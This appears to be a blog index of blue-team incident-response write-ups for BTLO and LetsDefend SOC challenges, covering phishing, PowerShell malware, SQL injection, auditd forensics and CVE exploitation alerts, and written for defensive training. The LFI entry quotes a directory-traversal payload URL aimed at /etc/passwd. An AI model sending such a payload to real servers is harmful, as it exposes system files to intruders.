Writeups for Blue Team Labs Online (BTLO) challenges.

Focus areas:

  • Log analysis
  • Endpoint forensics
  • Detection engineering
  • Threat hunting techniques

Emphasis is on blue-team thinking and investigation flow.

SOC326 Case Study: Impersonating Domain MX Record Change Leading to Active Phishing Campaign

Event ID: 304 Rule Name: SOC326 – Impersonating Domain MX Record Change Detected Severity: HIGH Category: Brand Protection / Phishing Event Time: September 17, 2024 – 12:05 PM Impacted Asset: LETSDEFEND Background Sometimes attackers don’t kick the door down — they quietly make a copy of your house key first. In this case, the threat actor registered a look-alike domain and configured email infrastructure before launching a phishing campaign. What initially appeared to be an early warning quickly escalated into active exploitation, resulting in a user clicking a malicious link and communicating with attacker-controlled infrastructure.
[Read more]

SOC153 Case Study: Malicious PowerShell Execution Leading to Active Malware Infection

Event ID: 238 Rule Name: SOC153 – Suspicious PowerShell Script Executed Severity: HIGH Category: Endpoint Compromise / Malware Event Time: March 14, 2024 – 05:23 PM Compromised Host: Tony (172.16.17.206) Tony at work opened a suspicious file they probably shouldn’t have. It was like finding a strange USB drive in the parking lot and plugging it into your computer you don’t know what’s on it, but it starts doing things automatically.
[Read more]

SOC127 Case Study: Successful SQL Injection Attack via Automated Tooling

Alert Name: SOC127 – SQL Injection Detected Severity: High Event ID: 235 Event Time: Mar 07, 2024 – 12:51 PM Category: Web Application Attack Platform: LetsDefend SOC This incident shows how someone on the internet tried to trick a website into giving out information it wasn’t supposed to. Instead of breaking in directly, the attacker sent specially crafted messages to the website to see how it would respond. Even though the website replied with “everything is OK,” it was actually doing things it shouldn’t have in the background.
[Read more]

BTLO Incident Response Case Study: Pranoid

Executive Summary A forensic review of Linux auditd logs confirms that the host was compromised through an external SSH brute-force attack. The attacker authenticated as a low-privileged user, executed automated system enumeration, escalated privileges using a local sudo vulnerability, accessed sensitive credential material, and attempted basic anti-forensic cleanup. The entire intrusion lifecycle occurred within approximately six minutes. Scope and Evidence Primary artifact: audit.log (Linux auditd) Tools used: aureport ausearch Manual timeline correlation Observed timeframe:
[Read more]

SOC205 Case Study: Malicious Macro Execution via Phishing Invoice

Alert Name: SOC205 – Malicious Macro has been executed Severity: High Event ID: 231 Event Time: Feb 28, 2024 – 08:42 AM Category: Malware Platform: LetsDefend SOC Executive Summary (Management / Business) On February 28, 2024, a user received a malicious email that appeared to contain a legitimate invoice document. When the user opened the attachment, hidden malicious code inside the document was automatically executed. This hidden code attempted to connect to an external system controlled by an attacker and download additional harmful software.
[Read more]

Packet Puzzle

Scenario You are a junior security analyst at a small Japanese cryptocurrency trading company. After detecting suspicious activity on the internal network, you exported a PCAP for further investigation.
[Read more]

Space Age

Introduction The year is 2525 and you’ve just embarked on a journey to visit all planets in the Solar System (Mercury, Venus, Earth, Mars, Jupiter, Saturn, Uranus and Neptune). The first stop is Mercury, where customs require you to fill out a form (bureaucracy is apparently not Earth-specific). As you hand over the form to the customs officer, they scrutinize it and frown. “Do you really expect me to believe you’re just 50 years old?
[Read more]

LetsDefend SOC138 – Suspicious XLS Malware Analysis

Alert Name: SOC138 – Detected Suspicious Xls File Severity: High Event ID: 77 Event Time: Mar 13, 2021, 08:20 PM Category: Malware Play Book 1. Alert Overview A high-risk malware alert was triggered due to the detection of a suspicious Excel macro-enabled file (.xlsm) on the host Sofia. Macro-enabled Excel documents are commonly abused to deliver malware via embedded VBA code that downloads and executes malicious payloads. The file was allowed by the security device, increasing the potential risk of system compromise.
[Read more]

GothamLegend Incident Response – PowerShell Malware Analysis

Scenario Recently the networks of a large company named GothamLegend were compromised after an employee opened a phishing email containing malware. The damage caused was critical and resulted in business-wide disruption. GothamLegend had to reach out to a third-party incident response team to assist with the investigation. You are a member of the IR team - all you have is an encoded Powershell script. Can you decode it and identify what malware is responsible for this attack?
[Read more]

LetsDefend HTTP Basic Authentication Analysis – PCAP Investigation

Description In this challenge, we receive a log indicating a possible web-based attack. The objective is to analyze a provided PCAP file and extract meaningful information related to HTTP activity and authentication. Investigation Process Recovering the PCAP File The PCAP was initially obtained in a Vm from there i obtained the files. The following commands were used to take the files out of the vm as here was not much network traffic so no large size of the file:
[Read more]

LetsDefend SOC168 – Command Injection (whoami) Web Attack Analysis

Alert Name: SOC168 – Whoami Command Detected in Request Body Severity: High Event ID: 118 Event Time: Feb 28, 2022, 04:12 AM Category: Web Attack Play Book 1. Alert Overview A high-severity web attack alert was triggered on WebServer1004 due to the detection of the whoami command within the HTTP request body. This behavior is commonly associated with command injection attempts, where an attacker tries to execute system-level commands through a web application.
[Read more]

LetsDefend SOC170 – Local File Inclusion (LFI) Attempt Analysis

Field Value Event ID 120 Event Time Mar 01, 2022, 10:10 AM Rule SOC170 – Passwd Found in Requested URL – Possible LFI Attack Analyst Level Security Analyst Hostname WebServer1006 Destination IP Address 172.16.17.13 Source IP Address 106.55.45.162 HTTP Request Method GET Requested URL https://172.16.17.13/?file=../../../../etc/passwd User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Alert Trigger Reason URL contains passwd Device Action Allowed Play Book 1. Alert Overview A web attack alert was triggered on WebServer1006 due to the detection of a directory traversal payload attempting to access the sensitive system file /etc/passwd via an HTTP GET request.
[Read more]

LetsDefend SOC335 – CVE-2024-49138 Privilege Escalation Exploitation Analysis

Alert Name: SOC335 – CVE-2024-49138 Exploitation Detected Severity: High Event ID: 313 Event Time: Jan 22, 2025, 02:37 AM Category: Privilege Escalation Base Information Field Value Event ID 313 Event Time Jan 22, 2025, 02:37 AM Rule SOC335 – CVE-2024-49138 Exploitation Detected Analyst Level Security Analyst Hostname Victor IP Address 172.16.17.207 Process Name svohost.exe Process Path C:\temp\service_installer\svohost.exe Process ID 7640 Parent Process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Command Line ??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 File Hash (SHA-256) b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9 Process User EC2AMAZ-ILGVOIN\LetsDefend Trigger Reason Suspicious behavior patterns linked to CVE-2024-49138 Device Action Allowed Incident Details Field Value Incident Name EventID 313 – SOC335 CVE-2024-49138 Exploitation Incident Type Privilege Escalation Created Date Jan 08, 2026, 09:12 AM Pre-Investigation Notes Date: Jan 22, 2025, 02:37 AM Hostname: Victor IP Address: 172.
[Read more]

LetsDefend SOC336 – Windows OLE Zero-Click RCE (CVE-2025-21298) Analysis

Alert Name: SOC336 – Windows OLE Zero-Click RCE Exploitation Detected Severity: Critical Event ID: 314 Event Time: Feb 04, 2025, 04:18 PM Category: Malware Base Information Field Value Severity Critical Event ID 314 Event Time Feb 04, 2025, 04:18 PM Rule Name SOC336 – Windows OLE Zero-Click RCE Exploitation Detected CVE CVE-2025-21298 Analyst Level Security Analyst Source IP / SMTP Address 84.38.130.118 Sender Email projectmanagement@pm.me Recipient Email Austin@letsdefend.io Email Subject Important: Action Required for Upcoming Project Deadline Attachment Name mail.
[Read more]